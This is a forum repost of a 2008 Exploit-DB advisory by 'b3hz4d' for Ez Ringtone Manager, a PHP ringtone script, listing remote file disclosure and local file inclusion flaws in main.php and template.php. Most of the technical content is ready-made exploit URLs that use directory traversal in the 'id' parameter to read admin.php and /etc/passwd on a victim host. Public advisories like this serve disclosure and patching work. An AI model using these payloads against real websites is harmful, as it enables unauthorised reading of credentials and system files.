Exploit Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7190
Проверка EDB
  1. Пройдено
Автор
B3HZ4D
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6112
Дата публикации
2008-11-22
Код:
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                    +
        +            Ez Ringtone Manager Multiple Vulnerabilities            +
        +                                                                    +
        +                      Discovered by b3hz4d                          +
        +                                                                    +
        +                      WwW.DeltaHacking.Net                          +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 22 nov 2008
SITE   : WwW.DeltaHacking.Net


#####################################################

APPLICATION  : Ez Ringtone Manager
DOWNLOAD(10$): http://www.scriptsez.net/?action=details&cat=Music%20Libraries&id=1190620143
VENDOR       : http://www.scriptsez.net/
DEMO         : http://demo.scriptsez.net/ringtones/demo.html

#####################################################


[+] vuln    : ./main.php
              ./template.php


               vulnerability is in main.php that included in template.php


[1] Remote File Disclosure:

[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../admin.php
              http://victim.com/ringtones/template.php?action=detail&id=../admin.php

[2] Local File Inclusion:

[~] Exploit : http://victim.com/ringtones/main.php?action=detail&id=../../../../../../../../../../../../../etc/passwd
              http://victim.com/ringtones/template.php?action=detail&id=../../../../../../../../../../../../../etc/passwd

##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & snoop-security.com #

##########################################################################################################

# milw0rm.com [2008-11-22]
 
Источник
www.exploit-db.com

Похожие темы